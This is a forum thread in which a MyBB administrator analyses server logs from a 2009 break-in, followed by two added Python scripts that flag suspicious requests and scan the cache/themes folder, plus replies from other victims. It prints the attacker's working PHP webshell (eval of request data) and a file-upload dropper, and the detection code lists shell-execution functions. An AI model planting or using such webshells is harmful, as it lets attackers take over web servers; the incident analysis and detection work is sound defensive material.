MyBB Community Forums

Full Version: My 1.4.6 forum got hacked. A close view.
Hi there! As I mentioned here earlier today, my forum got hacked, because I did not upgrade in time.

If you don't mind, I want to have a closer look at what happened here, using the server's log file. Maybe you can help me understand the steps the hacker took.

First, the user found the forum via the copyright bit and Yahoo:
94.101.131.240 www.mysite.org - [01/Jul/2009:10:53:11 +0200] "GET /forum/archive/index.php HTTP/1.1" 200 2776 "http://search.yahoo.com/search?p="powered+by+mybb"+site:de&y=Search&fr=sfp&fr2=sb-top&xargs=0&pstart=1&b=1&xa=vNWg0lcwjpUdScW1_BEtoQ--,1246558928" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

Next he went to the root of the forum and also called task.php. I don't really know what task.php is for at all. Maybe you can explain?
94.101.131.240 www.mysite.org - [01/Jul/2009:10:53:39 +0200] "GET /forum/ HTTP/1.1" 200 4167 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:53:45 +0200] "GET /forum/task.php HTTP/1.1" 200 54 "http://www.mysite.org/forum/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

Now he registered. He had to do this, because the 1.4.6 vulnerability is in the user profile edit page (as far as I understood the patch).
94.101.131.240 www.mysite.org - [01/Jul/2009:10:53:47 +0200] "GET /forum/member.php?action=register HTTP/1.1" 200 3170 "http://www.mysite.org/forum/" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:53:48 +0200] "GET /forum/task.php HTTP/1.1" 200 54 "http://www.mysite.org/forum/member.php?action=register" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:14 +0200] "POST /forum/member.php HTTP/1.1" 200 4589 "http://www.mysite.org/forum/member.php?action=register" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:15 +0200] "GET /forum/jscripts/captcha.js?ver=1400 HTTP/1.1" 200 1352 "http://www.mysite.org/forum/member.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:16 +0200] "GET /forum/captcha.php?action=regimage&imagehash=389a7312e4187f4e30a680a47ba28ff3 HTTP/1.1" 200 16918 "http://www.mysite.org/forum/member.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:17 +0200] "GET /forum/task.php HTTP/1.1" 200 54 "http://www.mysite.org/forum/member.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:29 +0200] "POST /forum/xmlhttp.php?action=username_availability HTTP/1.1" 200 49 "http://www.mysite.org/forum/member.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:35 +0200] "POST /forum/member.php HTTP/1.1" 200 1035 "http://www.mysite.org/forum/member.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:36 +0200] "POST /forum/xmlhttp.php?action=validate_captcha HTTP/1.1" 200 100 "http://www.mysite.org/forum/member.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:38 +0200] "GET /forum/index.php HTTP/1.1" 200 4363 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

94.101.131.240 www.mysite.org - [01/Jul/2009:10:54:39 +0200] "GET /forum/task.php HTTP/1.1" 200 54 "http://www.mysite.org/forum/index.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

At this moment, the hacker switches browsers. He uses "Flock". I've never heard of it before and I don't know why he switched. Maybe you've got an idea?
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:08 +0200] "POST /forum//member.php HTTP/1.1" 200 2369 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008121620 Firefox/3.0.5 Flock/2.0.3"

He's messing around in the user control panel. Logs don't really tell what he did there, but I guess he injected something into the birthday field:
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:08 +0200] "GET /forum//usercp.php?action=profile HTTP/1.1" 200 19208 "http://www.mysite.org/forum//member.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008121620 Firefox/3.0.5 Flock/2.0.3"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:10 +0200] "POST /forum//member.php HTTP/1.1" 200 5 "http://www.mysite.org/forum//usercp.php?action=profile" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008121620 Firefox/3.0.5 Flock/2.0.3"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:11 +0200] "POST /forum//usercp.php HTTP/1.1" 200 2487 "http://www.mysite.org/forum//usercp.php?action=profile" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008121620 Firefox/3.0.5 Flock/2.0.3"

Now he tries to access the admin panel. I don't think that worked, since his user account was not an admin, of course. I don't know why he did this. Just another attempt? That would be most interesting.
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:12 +0200] "POST /forum///admin//index.php HTTP/1.1" 200 7049 "http://www.mysite.org/forum//usercp.php?action=profile" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008121620 Firefox/3.0.5 Flock/2.0.3"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:13 +0200] "POST /forum///admin//index.php?module=config/mycode&action=xmlhttp_test_mycode HTTP/1.1" 200 5 "http://www.mysite.org/forum///admin//index.php?module=config/mycode&action=edit&cid=1" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008121620 Firefox/3.0.5 Flock/2.0.3"

Now he accesses themes.php in the cache/themes subfolder. This file doesn't belong to MyBB, so he created it in one of the prior steps. Can you tell me which one?
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:17 +0200] "GET /forum///cache/themes/themes.php HTTP/1.1" 200 19 "-" "-"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:18 +0200] "POST /forum//usercp.php HTTP/1.1" 200 2487 "http://www.mysite.org/forum//usercp.php?action=profile" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008121620 Firefox/3.0.5 Flock/2.0.3"
themes.php looks like this:
<?PHP if (isset($_REQUEST[x])) eval(stripslashes($_REQUEST[x])); ?>

Now he inserted a base64-encoded string which created the file last.php. That's also in cache/themes.
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:19 +0200] "GET /forum//cache/themes/themes.php?x=eval(base64_decode(%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%22)); HTTP/1.1" 200 5 "http://www.mysite.org/forum//usercp.php?action=profile" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.5) Gecko/2008121620 Firefox/3.0.5 Flock/2.0.3"

The base64-encoded stuff and the content of last.php read like this:
<?php
$msg = copy($_FILES[hambas][tmp_name],$_FILES[hambas][name]) ? "works" : "notworks";
echo $_FILES[hambas][name];
echo $msg;
?>
<form ENCTYPE="multipart/form-data" ACTION="" METHOD="POST"> 
<input NAME="hambas" TYPE="file"> 
<input VALUE="submit" TYPE="submit"></form>

For some reason, he now switches back to normal Firefox and accesses the newly created file, which now fetches another, big PHP file, called inc.php.
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:29 +0200] "GET /forum//cache/themes/last.php HTTP/1.1" 200 161 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"
94.101.131.240 www.mysite.org - [01/Jul/2009:10:55:54 +0200] "POST /forum//cache/themes/last.php HTTP/1.1" 200 175 "http://www.mysite.org/forum//cache/themes/last.php" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.0.10) Gecko/2009042316 Firefox/3.0.10"

The rest of his accesses are on /forum//cache/themes/inc.php, where he can see and delete everything that PHP can.
inc.php is a 250 kbyte hacking tool.


Do you have any explanations for the stuff that I don't understand? Thank you!!

And keep up the good work!
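As an added example (not code from the original post, from MyBB, or from anyone in this thread), here is a small Python script that parses access-log lines in the same vhost-prefixed combined format as the ones quoted above and flags the indicators that are visible in this incident: PHP scripts served from the cache/ directory, query strings carrying PHP code such as eval( or base64_decode(, tool-style doubled slashes in the path, and PHP requests that arrive with neither a referer nor a user agent. The sample lines are constructed for the demo and use a documentation IP address and host name, not the real ones from the thread.

```python
import re
from dataclasses import dataclass
from urllib.parse import unquote, urlsplit

# Combined log format with the virtual host in the second field, as in the lines quoted above:
# ip vhost user [timestamp] "METHOD target PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) (?P<vhost>\S+) (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# PHP calls that have no business appearing in a query string.
CODE_IN_QUERY = ("eval(", "base64_decode(", "system(", "passthru(", "shell_exec(")


@dataclass
class Finding:
    ts: str
    ip: str
    target: str
    reason: str


def parse_line(line):
    """Return the named fields of one log line, or None if the line is not in the expected format."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None


def classify(entry):
    """Return the reasons why this request looks like post-exploitation activity (empty if clean)."""
    # Request targets in an access log start with a single slash, so urlsplit treats the
    # whole thing as path + query and never as scheme/netloc.
    parts = urlsplit(entry["target"])
    path = unquote(parts.path)
    query = unquote(parts.query).lower()
    reasons = []
    if path.lower().endswith(".php") and "/cache/" in path:
        reasons.append("PHP script executed from cache/ (expected to hold only CSS/data)")
    if any(call in query for call in CODE_IN_QUERY):
        reasons.append("query string carries PHP code")
    if "//" in path:
        reasons.append("doubled slash in path (typical of tool-generated requests)")
    if path.lower().endswith(".php") and entry["referer"] == "-" and entry["ua"] == "-":
        reasons.append("PHP request with no referer and no user agent")
    return reasons


def scan(lines):
    """Run classify() over every parseable line and collect the findings in log order."""
    findings = []
    for line in lines:
        entry = parse_line(line)
        if entry is None:
            continue
        for reason in classify(entry):
            findings.append(Finding(entry["ts"], entry["ip"], entry["target"], reason))
    return findings


# Constructed sample log, modelled on the thread's lines but with a documentation IP and host.
UA = "Mozilla/5.0 (example)"
SAMPLE_LOG = [
    f'203.0.113.5 www.example.org - [01/Jul/2009:10:53:39 +0200] "GET /forum/ HTTP/1.1" 200 4167 "-" "{UA}"',
    f'203.0.113.5 www.example.org - [01/Jul/2009:10:54:35 +0200] "POST /forum/member.php HTTP/1.1" 200 1035 "http://www.example.org/forum/member.php" "{UA}"',
    '203.0.113.5 www.example.org - [01/Jul/2009:10:55:17 +0200] "GET /forum///cache/themes/themes.php HTTP/1.1" 200 19 "-" "-"',
    f'203.0.113.5 www.example.org - [01/Jul/2009:10:55:19 +0200] "GET /forum//cache/themes/themes.php?x=eval(base64_decode(%22PD9waHA%22)); HTTP/1.1" 200 5 "http://www.example.org/forum//usercp.php?action=profile" "{UA}"',
]

if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f.ts}  {f.ip}  {f.target}\n    -> {f.reason}")
```

Feed it a real log with `scan(open("access.log"))`; the first two sample lines (the browsing and registration steps) produce nothing, while the two requests to the dropped themes.php trip several indicators each, which is the point: none of the individual signals is proof on its own, but a request that trips three at once is worth a look.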

I just got hacked as well, hella ton of files in the 'cache/themes' folder.

And I was running 1.4.8 =[

It happened when you were on 1.4.8?? Did you upload all the correct files??

I got hacked too
with mybb 1.4.5

Now how can I fix the problem?
I have reuploaded everything but it's still not working

Updating to the latest version now won't magically fix the problem....

Check to see if there's anything in your ./cache/themes/ folder that shouldn't be there.
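As an added example, not code from this thread or from MyBB, here is a Python checker for the advice above: it walks a cache/themes directory, reports any file whose extension is not one the script assumes MyBB keeps there (.css and .html are an assumption; adjust ALLOWED_EXT for your install), and greps every file for the constructs seen in the two dropper files quoted in the first post. The demo directory and its files are constructed by the script itself in a temporary folder.

```python
import os
import re
import tempfile

# File types assumed (not verified here) to be legitimate under cache/themes/.
ALLOWED_EXT = {".css", ".html"}

# Constructs seen in the two dropper files quoted in the thread, plus common webshell variants.
SHELL_PATTERNS = {
    "eval of request data": re.compile(r"eval\s*\([^;]*\$_(REQUEST|GET|POST|COOKIE)\b", re.I),
    "base64-packed code": re.compile(r"base64_decode\s*\(", re.I),
    "file upload handler": re.compile(r"(copy|move_uploaded_file)\s*\(\s*\$_FILES\b", re.I),
    "shell execution": re.compile(r"\b(system|passthru|shell_exec|popen|proc_open)\s*\(", re.I),
}

MAX_READ = 1024 * 1024  # only look at the first megabyte of any file


def scan_theme_cache(root):
    """Return (relative_path, reason) pairs for anything under root that should not be there."""
    findings = []
    for dirpath, _, files in os.walk(root):
        for name in sorted(files):
            full = os.path.join(dirpath, name)
            rel = os.path.relpath(full, root)
            ext = os.path.splitext(name)[1].lower()
            if ext not in ALLOWED_EXT:
                findings.append((rel, "unexpected file type %s" % (ext or "(none)")))
            # Content is scanned regardless of extension: a .css that the web server has
            # been configured to execute would otherwise slip through.
            with open(full, "rb") as fh:
                text = fh.read(MAX_READ).decode("utf-8", errors="ignore")
            for reason, pattern in SHELL_PATTERNS.items():
                if pattern.search(text):
                    findings.append((rel, reason))
    return findings


def build_demo(root):
    """Populate root with constructed files: two legitimate ones and the two droppers from the thread."""
    os.makedirs(os.path.join(root, "theme1"))
    fixtures = {
        os.path.join("theme1", "global.css"): "body { color: #333; }",
        "index.html": "<html></html>",
        "themes.php": '<?php if (isset($_REQUEST["x"])) eval(stripslashes($_REQUEST["x"])); ?>',
        "last.php": '<?php $msg = copy($_FILES["f"]["tmp_name"], $_FILES["f"]["name"]) ? "works" : "notworks"; echo $msg; ?>',
    }
    for rel, body in fixtures.items():
        with open(os.path.join(root, rel), "w") as fh:
            fh.write(body)


def run_demo():
    """Build the fixture directory in a temp folder, scan it and return the findings."""
    with tempfile.TemporaryDirectory() as tmp:
        build_demo(tmp)
        return scan_theme_cache(tmp)


if __name__ == "__main__":
    for rel, reason in run_demo():
        print(f"{rel}: {reason}")
    print("Real use: scan_theme_cache('/path/to/forum/cache/themes')")
```

On a real install call `scan_theme_cache` on the forum's cache/themes path; the extension check catches the files the attacker dropped by name, and the content check catches them even if they had been renamed to something that looks harmless.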

Well, that was educational.

Yes, I had properly upgraded. I've been doing this since MyBB gold was released.

(2009-07-01, 06:17 PM) compwhizii Wrote: Well, that was educational.

Still, there are some interesting questions left.
http://zone-h.org/archive/defacer=NobodyCoder/page=1

There, you can see all the mybb installs that have been hacked in the past two days. Good news, looks like less than 100. Maybe? :o

I changed the theme and the Iranian president is gone.

And the guy became administrator.